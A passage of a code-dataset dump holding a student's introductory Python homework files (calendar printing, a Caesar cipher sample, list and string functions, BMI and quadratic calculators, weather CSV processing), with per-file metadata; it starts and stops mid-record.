startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tJune\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tJuly\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAugust\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tSeptember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tOctober\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tNovember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tDecember\", year)\r\n monthly_calendar(31,startingDay)\r\n \r\ndef main():\r\n userYear = int(input(\"Please enter a year: \"))\r\n userBegin = int(input(\"Please enter the day to begin year (e.g: 1 for Monday, 2 for Tuesday): \"))\r\n yearly_calendar(userYear,userBegin)\r\nmain()\r\n \r\n \r\n\r\n"
},
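To make the start-day arithmetic in `monthly_calendar` concrete, here is a minimal standalone check (the helper name `next_start_day` is ours, not part of the homework file):

```python
# With Monday = 1 .. Sunday = 7, a month of n days that starts on weekday s
# pushes the next month to weekday ((n - 1 + s) % 7) + 1.
def next_start_day(days_in_month, starting_day):
    return (days_in_month - 1 + starting_day) % 7 + 1

assert next_start_day(31, 4) == 7   # 31 days from a Thursday -> next month starts Sunday
assert next_start_day(28, 2) == 2   # 28 days (exactly 4 weeks) keeps the same weekday
```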
{
"alpha_fraction": 0.595478892326355,
"alphanum_fraction": 0.6162998080253601,
"avg_line_length": 33.02083206176758,
"blob_id": "00acae8471a24e13cd970876bd6abe89ec1760ea",
"content_id": "9a1966ba8646d7932f11ad7acf39aec326855663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1681,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 48,
"path": "/Homework 7/Caesar_cipher_for_letters_sample_code_Frankl.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "##plain_text = input(\"Enter the plaintext (a positive integer) \" )\r\n##shift = int(input(\"Enter an integer between 0 and 9 \" ))\r\n##cipher_text = \"\"\r\n##for cur_char in plain_text:\r\n## cur_cipher = int(cur_char) + shift\r\n## print (cur_cipher)\r\n## if cur_cipher >= 10 :\r\n## cur_cipher = cur_cipher - 10\r\n## #cur_cipher is now between 0 and 9, inclusive\r\n## cipher_text = cipher_text + str(cur_cipher)\r\n##print(cipher_text)\r\n##\r\n###VERSION 2\r\n##print(\"version 2: \")\r\n##cipher_text = \"\"\r\n##for cur_char in plain_text:\r\n## cur_cipher = (int(cur_char) + shift) % 10\r\n## print (cur_cipher)\r\n## cipher_text = cipher_text + str(cur_cipher)\r\n##print(cipher_text)\r\n\r\nprint(\"version 3\")\r\nplain_text = input(\"Enter the plaintext (a string of capital letters): \" )\r\nshift = int(input(\"Enter an integer between 0 and 25: \" ))\r\ncipher_text = \"\"\r\nfor cur_char in plain_text:\r\n cur_cipher = ord(cur_char) + shift\r\n print (cur_cipher)\r\n if cur_cipher >= 91 : # shifted past 'Z'\r\n cur_cipher = cur_cipher - 26 # \"wrap around\"\r\n #cur_cipher is now between ord('A') and ord('Z'), inclusive\r\n cipher_text = cipher_text + chr(cur_cipher)\r\nprint(cipher_text)\r\n\r\n\r\n#VERSION 4\r\nprint(\"version 4: \")\r\ncipher_text = \"\"\r\nfor cur_char in plain_text:\r\n #cur_cipher = (int(cur_char) + shift) % 10\r\n shifted = ord(cur_char) - 65 + shift #between shift and 25 + shift\r\n shifted_wrapped = shifted % 26 #between0 and 25\r\n regular_encoding = shifted_wrapped + 65\r\n cur_cipher = chr(regular_encoding)\r\n print (cur_cipher)\r\n #cipher_text = cipher_text + str(cur_cipher)\r\n cipher_text = cipher_text + cur_cipher\r\nprint(cipher_text)\r\n"
},
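The wrap-around logic in versions 3 and 4 above reduces to a single modular expression; this compact restatement is ours, not part of the sample code:

```python
# Shift a string of capital letters within A-Z (65 == ord('A'), 26 letters).
def caesar(text, shift):
    return "".join(chr((ord(c) - 65 + shift) % 26 + 65) for c in text)

assert caesar("XYZ", 3) == "ABC"                   # wraps around past 'Z'
assert caesar(caesar("HELLO", 7), -7) == "HELLO"   # decoding is just a negative shift
```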
{
"alpha_fraction": 0.5069444179534912,
"alphanum_fraction": 0.5400883555412292,
"avg_line_length": 24.049999237060547,
"blob_id": "6f9af70bd2a09bbef561dca76f1d96ec5031d870",
"content_id": "6db5ab309f1502fad955412fa5c2a13d0de9b8ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 120,
"path": "/Homework 9/hw9.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nCS-UY 1114\r\nProfessor Frankl\r\nM Touhid Chowdhury\r\nmtc405 N14108583\r\nhw 9\r\nfunction to give the maximum absolute value, function to find all indexes of given value,\r\nfunction that reverses string, another function that reverses in place, function that encodes a string,\r\nfunction that decodes the string\r\n'''\r\n\r\ndef max_abs_val(lst):\r\n index = 0\r\n lengthOfLst= len(lst)\r\n while index < lengthOfLst:\r\n if lst[index] < 0:\r\n newNumber = lst[index] * -1\r\n lst.pop(index)\r\n lst.insert(index,newNumber)\r\n index += 1\r\n firstNumber = lst[0]\r\n for numbers in lst:\r\n if numbers > firstNumber:\r\n firstNumber = numbers\r\n return firstNumber \r\n\r\ndef main_q1():\r\n print(\"Q1\")\r\n print(\" Sample execution using [-19, -3, 20, -1, 0, -25] : \")\r\n lst = [-19, -3, 20, -1, 0, -25]\r\n maximum = max_abs_val(lst)\r\n print(maximum)\r\nmain_q1()\r\n\r\ndef find_all(lst, val):\r\n index = 0\r\n newList = []\r\n for number in lst:\r\n if number == val:\r\n newList.append(index)\r\n index +=1\r\n return newList\r\n\r\ndef main_q2():\r\n print(\"Q2\")\r\n print(\"Sample execution using [‘a’, ‘b’, 10, ‘bb’, ‘a’] and 'a'\")\r\n lst = ['a', 'b', 10, 'bb', 'a']\r\n value = 'a'\r\n newList = find_all(lst, value)\r\n print(newList)\r\nmain_q2()\r\n\r\n\r\ndef reverse1 (lst):\r\n newList =[]\r\n endingIndex = len(lst)-1 \r\n while endingIndex >= 0:\r\n newList.append(lst[endingIndex])\r\n endingIndex -= 1 \r\n return newList \r\n\r\ndef reverse2 (lst):\r\n indexs= len(lst)-1\r\n index= 0 \r\n while indexs > index:\r\n lst.append(lst[indexs-1])\r\n lst.pop(indexs-1)\r\n indexs -= 1\r\n return lst \r\n\r\ndef main_q3():\r\n print(\"Q3\")\r\n lst1 = [1, 2, 3, 4, 5, 6]\r\n rev_lst1 = reverse1(lst1)\r\n print(\"After reverse1, lst1 is \", lst1, \" and the returned list is \", rev_lst1)\r\n lst2 = [1, 2, 3, 4, 5, 6]\r\n reverse2(lst2)\r\n print(\"After reverse2, lst2 is \", lst2)\r\n\r\nmain_q3()\r\n\r\n\r\ndef encoder(string):\r\n encodedList = []\r\n counter = 1\r\n length = len(string)\r\n for index in range(0,length):\r\n if index < (length-1): \r\n if string[index] == string[index+1]: \r\n counter+= 1\r\n elif string[index] != string[index+1]:\r\n encodedList.append([string[index],counter]) \r\n counter = 1 \r\n elif index == (length-1): \r\n if string[index] == string[index-1]: \r\n counter += 1\r\n encodedList.append([string[index],counter-1]) \r\n else:\r\n encodedList.append([string[index],counter])\r\n counter = 1\r\n return encodedList\r\n\r\n \r\ndef decode(lst):\r\n string = \"\"\r\n for character, numberOfCharacters in lst:\r\n string += character * numberOfCharacters\r\n return string\r\n \r\ndef main_q4():\r\n print(\"Q4\")\r\n print(\" String is 'aadccccaa' decoding will give: \")\r\n string= 'aadccccaa'\r\n encoded = encoder(string)\r\n print(encoded)\r\n print(\"Encoded to string is: \")\r\n backToString = decode(encoded)\r\n print(backToString)\r\n\r\nmain_q4()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n"
},
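For comparison with `encoder()`/`decode()` in hw9.py, the same run-length encoding can be written with `itertools.groupby`; this sketch (function names ours) produces the same `[character, count]` pairs:

```python
from itertools import groupby

def encode_rle(s):
    # group consecutive identical characters, then record each run's length
    return [[ch, len(list(run))] for ch, run in groupby(s)]

def decode_rle(pairs):
    return "".join(ch * n for ch, n in pairs)

assert encode_rle("aadccccaa") == [["a", 2], ["d", 1], ["c", 4], ["a", 2]]
assert decode_rle(encode_rle("aadccccaa")) == "aadccccaa"
```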
{
"alpha_fraction": 0.7099697589874268,
"alphanum_fraction": 0.7160120606422424,
"avg_line_length": 39.25,
"blob_id": "56f13f64677e95f9a0790e48e12eb402613de7c8",
"content_id": "650e48c6dbd03cf4f2b7e0ded329f308a17b7fd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 8,
"path": "/Homework 2/hw2q1a.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#calculate the BMI of person by taking their weight and height\r\n\r\nweight = float(input(\"please enter weight in kilograms:\")) #user weight input\r\nheight = float(input(\"please enter height in meters:\"))# user height input\r\n\r\nBMI = weight / (height**2) #using the BMI formula \r\n\r\nprint (\"BMI is\", round(BMI,7))#printing the results \r\n"
},
{
"alpha_fraction": 0.7084444165229797,
"alphanum_fraction": 0.7173333168029785,
"avg_line_length": 35.16666793823242,
"blob_id": "e5956e976033dbc9c98dc97f5d19fb85c172eb32",
"content_id": "65dde6f781b2b81d829f25ba931305da9e47ab3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1125,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/Homework 2/hw2q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#adding johns and bills worked time together \r\n\r\n#getting John's data\r\ndaysJohn = int(input(\"Please enter the number of days John worked:\"))\r\nhoursJohn = int(input(\"please enter the number of hours John worked\"))\r\nminutesJohn = int(input(\"please enter the number of minutes John worked\"))\r\n\r\n#getting bills data\r\ndaysBill = int(input(\"Please enter the number of days Bill worked:\"))\r\nhoursBill = int(input(\"please enter the number of hours Bill worked\"))\r\nminutesBill = int(input(\"please enter the number of minutes Bill worked\"))\r\n\r\n#adding Johns and Bills data\r\ndaysTotal = daysJohn + daysBill\r\nhoursTotal = hoursJohn + hoursBill \r\nminutesTotal = minutesJohn + minutesBill\r\n\r\n#running a loop on the hours to convert them to days \r\nwhile hoursTotal >= 24:\r\n daysTotal = daysTotal + 1\r\n hoursTotal = hoursTotal - 24\r\n#running a loop on minutes to convert them to hours \r\nwhile minutesTotal >= 60:\r\n hoursTotal = hoursTotal + 1\r\n minutesTotal = minutesTotal - 60\r\n\r\n\r\n#printing the data \r\nprint(\"John and Bill worked in total\", daysTotal,\"days\", hoursTotal,\"hours and \",\\\r\n minutesTotal,\"minutes\")\r\n \r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 33.75,
"blob_id": "b874bd522ef3dd42cdb0a6601c58a0edc34c0b29",
"content_id": "53e3550ae65238c3f0141d579bc5fe54c1c8147c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/Homework 2/hw2q5.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "import datetime\r\n\r\ntoday = datetime.date.today() #using module to get today's date\r\nprint (\"The date today is:\", today)#printing today's date\r\n"
},
{
"alpha_fraction": 0.6897590160369873,
"alphanum_fraction": 0.6897590160369873,
"avg_line_length": 27.636363983154297,
"blob_id": "eda818033e3e7022ed30294e79db4b2c3d3e0b1a",
"content_id": "40b717ae0d4d306fcbbe65f97ce9abb455a2e2f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Homework 5/hw5q6.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#obtaining user string\r\nuserString = input(\"Please enter line of text: \")\r\n#obtaining letter to remove \r\ncharacter = input(\"Please enter a character you want to remove: \")\r\n#new string initialized\r\nstring =\"\"\r\nfor letter in userString:\r\n if letter != character:\r\n string += letter\r\n#print new string\r\nprint(string)\r\n \r\n"
},
{
"alpha_fraction": 0.7191392779350281,
"alphanum_fraction": 0.7485843896865845,
"avg_line_length": 29.535715103149414,
"blob_id": "08ddabdadb6079ebf00601349323b97498e026cc",
"content_id": "af215e3a704d7d47637cfe789d671c7fdb13ecf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 28,
"path": "/Homework 1/q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#this program takes years in integers and prints out estimated population\r\n\r\nimport math\r\n\r\n#constants \r\ncurrentPopulation = 307357870\r\ndaysInYear = 365\r\nHourInDay = 24\r\nsecondsInHour = 3600\r\n#getting user input of number of years \r\nuserInputYear = int(input(\"please enter the number of years: \"))\r\n\r\n#telling the user to wait while the program calculates\r\nprint(\"Please wait while we calculate....\")\r\n\r\n#converting user input to seconds \r\nseconds = userInputYear * daysInYear * HourInDay * secondsInHour\r\n\r\n#getting the change of rate of each difference \r\nbirthRate = seconds * (1/7)\r\ndeathRate = seconds * (1/13)\r\nimmigrantRate = seconds * (1/35)\r\n\r\n#adding the changes to current population to get the new population \r\npopulation = currentPopulation + birthRate + immigrantRate - deathRate\r\n\r\n#print new population \r\nprint(\" The estimated population growth is\", int(population))\r\n"
},
{
"alpha_fraction": 0.701298713684082,
"alphanum_fraction": 0.7229437232017517,
"avg_line_length": 43,
"blob_id": "abdd5518cd50e04e27e1fac523a75e37730b64e8",
"content_id": "85e0bd5238ac4273bb0b37dc12fd223fc2be0e9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 5,
"path": "/Homework 1/q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#question 3\r\n#program that asks for the user’s name and prints a personalized welcome message\r\n\r\nuserName = input(\"Please enter your name: \") #asking for name\r\nprint(\"Hello\",userName,\"Welcome to CS-UY 1114.\") #print message\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6425073742866516,
"alphanum_fraction": 0.654260516166687,
"avg_line_length": 21.744186401367188,
"blob_id": "90ad86af3e20132f5b9f865886528cc09a57f757",
"content_id": "9b7b74d82b3df94c560021fb803d44af6de5960c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1021,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 43,
"path": "/Homework 8/hw8q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nM Touhid Chowdhury\r\nmtc405\r\nfunction that returns the first word in a phrase\r\nfunction that removes first word and gives remaining\r\nfunction that reverses the phrase\r\nmain() interacts with user\r\n'''\r\n\r\n\r\ndef returnFirstWord(phrase):\r\n indexOfFirstWord = phrase.find(' ')\r\n if indexOfFirstWord == -1:\r\n firstWord = phrase\r\n else:\r\n firstWord = phrase[:indexOfFirstWord]\r\n return firstWord\r\n\r\n\r\ndef removeFirstWord(phrase):\r\n indexOfFirstWord = phrase.find(' ')\r\n newPhrase = phrase[indexOfFirstWord+1:]\r\n return newPhrase\r\n\r\n\r\ndef reversePhrase(phrase):\r\n wordsInPhrase= phrase.count(' ')+1\r\n reversed1= \"\"\r\n count = 1\r\n while count <= wordsInPhrase:\r\n reversed1 =returnFirstWord(phrase) + ' '+ reversed1\r\n phrase = removeFirstWord(phrase)\r\n count += 1\r\n return reversed1\r\n\r\n\r\ndef driverMain():\r\n userPhrase = input(\"Please enter a phrase to reverse\")\r\n newLine = reversePhrase(userPhrase)\r\n print(newLine)\r\n return newLine\r\n \r\ndriverMain()\r\n"
},
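`reversePhrase()` above peels off one word at a time; the same word-order reversal fits in a single expression with `str.split()` (function name ours):

```python
def reverse_phrase(phrase):
    # split on whitespace, reverse the word order, rejoin with single spaces
    return " ".join(reversed(phrase.split()))

assert reverse_phrase("one two three") == "three two one"
```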
{
"alpha_fraction": 0.6315120458602905,
"alphanum_fraction": 0.6454892158508301,
"avg_line_length": 50.06666564941406,
"blob_id": "8e3aeedca99b9abff8282876fbf5b655c1f10a76",
"content_id": "cdee46b5ac0e5e26d9949334b544ec3e9eef99b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 787,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 15,
"path": "/Homework 3/hw3q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#homework 3 question 4\r\n\r\n#getting the input of the sides \r\na = float(input(\"Length of first side: \"))\r\nb = float(input(\"Length of second side: \"))\r\nc = float(input(\"Length of third side: \"))\r\n\r\nif a == b and b == c and a ==c :# if all sides equal equalateral triangle\r\n print(\"This is a equilateral triangle\")\r\nelif a == b or a == c or b == c:# if two sides equal isosceles triangle\r\n print(\"this is a isoseles triangle\")\r\nelif (a == b or a == c or b == c) and (a**2 + b**2 == c**2 or a**2 + c**2 == b**2 or c**2 + b**2 == a**2):\r\n print(\"this is an isosceles right triangle \")#if two sides equal and pythagorean formula fits its isosceles right triangle\r\nelse:#if none of the conditions apply its neither \r\n print(\"neither equalateral nor isosceles right triangle\")\r\n \r\n"
},
{
"alpha_fraction": 0.6138691902160645,
"alphanum_fraction": 0.6390858888626099,
"avg_line_length": 41.75862121582031,
"blob_id": "c32f641f653478d25932944d0ff4258a0025e399",
"content_id": "f984cd9e30aeef3c55123c89c7c86c270d097864",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1269,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 29,
"path": "/Homework 3/hw3q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "import math #importing a module\r\n\r\n#getting users input\r\na = float(input(\"Please enter a value for a: \"))\r\nb = float(input(\"Please enter a value for b: \"))\r\nc = float(input(\"Please enter a value for c: \"))\r\n\r\n#calculating discrimant to see how many solutions\r\ndiscrimant = b**2 - (4 * a * c )\r\n\r\nif a == 0 and b == 0 and c == 0:\r\n print(\"this equation has infinite number of solutions.\")#infinite\r\nelif a == 0 and b == 0 and c != 0:\r\n print(\"this equation has no solutions.\")#no solution\r\nelif discrimant < 0:\r\n print(\"There is no real solutions\")#if discrimant negative no solution\r\n\r\nelif a!=0 and discrimant == 0:\r\n solution = (-b + math.sqrt(discrimant)) / (2 * a)\r\n print (\"This equation has one solutions: \", solution)#if discrimant equals 0 one solution\r\nelif a != 0 and discrimant > 0:\r\n solution1 = (-b + math.sqrt(discrimant)) / (2 * a)#solution1 1 \r\n solution2 = (-b - math.sqrt(discrimant)) / (2 * a)#solution 2 \r\n print(\"This equation has two solutions: x = \", solution1, \"and x = \", solution2)#discrimant greater than 0\r\nelif a ==0 and b!= 0 and c != 0:#linear\r\n solut = -c/b\r\n print(' the equation has single solution x =', solut)\r\nelif a == 0 and b!=0 and c ==0:\r\n print(\"this equation has single real solution x =0\")\r\n"
},
{
"alpha_fraction": 0.5780590772628784,
"alphanum_fraction": 0.6139240264892578,
"avg_line_length": 31.571428298950195,
"blob_id": "060405e20d3c55ca946155d6f608e8775ba17c0e",
"content_id": "9a8d59cdeb6287399685d9ef198513e7a615cd45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 14,
"path": "/Homework 5/hw5q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user input\r\nn = int(input(\"Please enter a positive integer: \"))\r\n#spaces\r\npattern1 =' '\r\n#stars \r\npattern2 ='*'\r\n#top triangle prints n lines to form the triangle \r\nfor number in range(0,n):\r\n line1 = pattern1*(number) + pattern2* ((n - number) * 2-1 ) \r\n print(line1)\r\n#bottom triangle prints n lines to form the triangle \r\nfor number in range(0,n):\r\n line2 = pattern1 * (n- 1 - number) + pattern2*((number*2) + 1)\r\n print(line2)\r\n\r\n"
},
{
"alpha_fraction": 0.6913123726844788,
"alphanum_fraction": 0.6931608319282532,
"avg_line_length": 29.823530197143555,
"blob_id": "0ca40eace80fe0a43b1d51ba51f8eac08155a73a",
"content_id": "e885213b7c9fb0afbbb9c0446e6226cb6cd14b85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 34,
"path": "/Homework 4/hw4q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#a\r\n#getting character from user\r\nuserCharacter = input(\"Please enter a character: \")\r\n\r\n#checking whether it is upper, lower, numeric or else \r\nif userCharacter.isupper()== True:\r\n print(userCharacter,\" is upper case letter.\")\r\nelif userCharacter.islower()== True:\r\n print(userCharacter,\" is lower case letter.\")\r\nelif userCharacter.isdigit()== True:\r\n print(userCharacter,\" is a digit.\")\r\nelse:\r\n print(userCharacter,\" is a non alphanumeric character.\")\r\n\r\n\r\n#b\r\n\r\n#without using string methods \r\n\r\n#getting character from user\r\nuserSecondCharacter = input(\"Please enter another character: \")\r\nAsciiValue = ord(userSecondCharacter)\r\n\r\n#comparing ascii values of the character to its specific grouping\r\n\r\n#printing the type \r\nif AsciiValue >= ord('a') and AsciiValue <= ord('z'):\r\n print(\"This is a lowercase letter.\")\r\nelif AsciiValue >= ord('A') and AsciiValue <= ord('Z'):\r\n print(\"This is a uppercase letter.\")\r\nelif AsciiValue >= ord('0') and AsciiValue <= ord('9'):\r\n print(\"This is a digit.\")\r\nelse:\r\n print(\"This is a non alphanumeric character.\")\r\n"
},
{
"alpha_fraction": 0.5927594900131226,
"alphanum_fraction": 0.6145121455192566,
"avg_line_length": 36.77108383178711,
"blob_id": "3f73f9b5c399f697fca37a7d62f21fcb01aef3d7",
"content_id": "8df9c6c7c94cd903d1ef0df1d4238b36317a8674",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6436,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 166,
"path": "/Homework 11/hw11.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\n\r\nM. Touhid Chowdhury\r\nCS 1114\r\nmtc405\r\nN14108583\r\n\r\nNote: Used updated windows file\r\nFirst function cleans the data and makes new file with just city, date, high temp, low temp, and precipitation\r\nSecond Function converts farenheit to celsius\r\nthird function converts inch to centimeter\r\nfourth function uses the last two function to convert the cleaned data into metric units\r\nthe last function takes the metric file and a year and prints the average of the highests and the lowests \r\n'''\r\n\r\n\r\n# Part A\r\ndef clean_data(complete_weather_filename, cleaned_weather_filename):\r\n weather = open(complete_weather_filename, \"r\")\r\n cleaned = open(cleaned_weather_filename, \"w\")\r\n headers_line = weather.readline()#remove header line\r\n\r\n print(\"City\", \"Date\",\"High Temp\", \"Low Temp\", \"precipitation\", sep = \",\",file = cleaned) #new header\r\n #loop through file and print into new file only desired information\r\n #convert any alpha into 0 \r\n for curr_line in weather:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n city = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n precip = curr_list[8]\r\n if highTemp.isalpha():\r\n highTemp = 0\r\n if lowTemp.isalpha():\r\n lowTemp = 0\r\n if precip.isalpha():\r\n precip = 0 \r\n \r\n print(city, date, highTemp, lowTemp, precip, sep = \",\", file = cleaned)\r\n #close files after completing \r\n cleaned.close()\r\n weather.close()\r\n print('done')\r\n \r\n\r\n\r\n# Part B\r\ndef f_to_c(f_temperature):\r\n #convert farenheit to celsius\r\n celsius = (float(f_temperature)-32)*(5/9)\r\n return celsius\r\n\r\ndef in_to_cm(inches):\r\n #convert inches to centimeter\r\n centimeter = float(inches) * 2.54\r\n return centimeter\r\n\r\ndef convert_data_to_metric(imperial_weather_filename, metric_weather_filename):\r\n #convert all data to metric\r\n imperial = open(imperial_weather_filename, \"r\")\r\n metric = open(metric_weather_filename, \"w\")\r\n headline = imperial.readline()\r\n print(\"city\", \"date\",\"highTemp\", \"lowTemp\", \"precipitation\", sep = \",\", file = metric)\r\n for curr_line in imperial:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n city = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = f_to_c(curr_list[2])\r\n lowTemp = f_to_c(curr_list[3])\r\n precip = in_to_cm(curr_list[4])\r\n print(city, date, highTemp, lowTemp, precip, sep = \",\", file = metric)\r\n\r\n metric.close()\r\n imperial.close()\r\n print(\"done\")\r\n\r\n#Part C\r\ndef print_average_temps_per_month(city, weather_filename, unit_type):\r\n# prints average highs and lows in each month for the given city\r\n file = open(weather_filename, 'r')\r\n headline = file.readline()\r\n counterMonths= [0,0,0,0,0,0,0,0,0,0,0,0] #keep track of how many times each month occur\r\n valuesForHigh = [0,0,0,0,0,0,0,0,0,0,0,0]# keeps track of the highs of every month\r\n valuesForLow =[0,0,0,0,0,0,0,0,0,0,0,0] #keep track of the lows of every month \r\n countMetric = 0\r\n countImperial = 0 \r\n print(\"Average temperatures for \", city, \":\")\r\n for curr_line in file:\r\n curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n cityFile = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n monthDayYearList = date.split('/')\r\n if cityFile == city:\r\n for number in range(0,13):\r\n if monthDayYearList[0] == str(number):\r\n valuesForHigh [number-1] += float(highTemp)\r\n 
valuesForLow[number-1] += float(lowTemp)\r\n counterMonths[number-1] += 1\r\n #list of months to print\r\n month =[\"January\", \"February\", \"March\", \"April\",\"May\", \"June\", \"July\",\"August\",\"September\", \"October\", \"November\", \"December\"]\r\n if unit_type == \"imperial\":\r\n for appearance in counterMonths:\r\n print(month[countMetric],\":\",round(valuesForHigh[countMetric]/appearance,3),\"F High\",round(valuesForLow[countMetric]/appearance,3), \"F low\") \r\n countMetric +=1 \r\n if unit_type == \"metric\":\r\n for appearance in counterMonths:\r\n print(month[countImperial],\":\",round(valuesForHigh[countImperial]/appearance,3),\"C High\",round(valuesForLow[countImperial]/appearance,3), \"C low\") \r\n countImperial +=1\r\n file.close()\r\n \r\n\r\n\r\n\r\n#Part D\r\ndef highest_and_Lowest(metric_weather_file, year): \r\n # Write a function that tells you which year had how much average high tempt and low tempt for the available data\r\n # assume that the unit is metric\r\n # assume that all the data has the complete year for the years available (2010-2015)\r\n # assume user will put a year thats in the file\r\n # Use the metric file that you created in previous function\r\n file = open(metric_weather_file, \"r\")\r\n header = file.readline()\r\n highest = 0\r\n lowest = 0\r\n occur = 0\r\n yearsAvailable = [2010,2011,2012,2013,2014,2015]\r\n for curr_line in file:\r\n curr_line = curr_line.strip()\r\n curr_list = curr_line.split(',')\r\n cityFile = curr_list[0]\r\n date = curr_list[1]\r\n highTemp = curr_list[2]\r\n lowTemp = curr_list[3]\r\n monthDayYearList = date.split('/')\r\n \r\n if str(monthDayYearList[2]) == str(year):\r\n lowest += float(lowTemp)\r\n highest += float(highTemp)\r\n occur += 1\r\n if occur > 0:\r\n print(\"The average of the lowest temperatures of the year\",year,\"is\", round(lowest/occur, 2),\"C\", \"\\n\"\\\r\n \"and average of the highest temperatures is\", round(highest/ occur, 2),\"C\")\r\n else:\r\n print(\"THE YEAR IS NOT AVAILABLE\")\r\n\r\ndef main():\r\n print (\"Running Part A\")\r\n clean_data(\"weatherwindows.csv\", \"weather in imperial.csv\")\r\n \r\n print (\"Running Part B\")\r\n convert_data_to_metric(\"weather in imperial.csv\", \"weather in metric.csv\")\r\n \r\n print (\"Running Part C\")\r\n print_average_temps_per_month(\"San Francisco\", \"weather in imperial.csv\", \"imperial\")\r\n print_average_temps_per_month(\"New York\", \"weather in metric.csv\", \"metric\")\r\n print_average_temps_per_month(\"San Jose\", \"weather in imperial.csv\", \"imperial\")\r\n\r\n print (\"Running Part D\")\r\n highest_and_Lowest(\"weather in metric.csv\", 2011) \r\nmain()\r\n"
},
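The two Part B conversion helpers can be sanity-checked against well-known fixed points; they are restated here so the snippet runs on its own:

```python
def f_to_c(f):
    return (float(f) - 32) * (5 / 9)

def in_to_cm(inches):
    return float(inches) * 2.54

assert f_to_c(32) == 0.0      # freezing point of water
assert f_to_c(212) == 100.0   # boiling point of water
assert in_to_cm(1) == 2.54
```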
{
"alpha_fraction": 0.699857771396637,
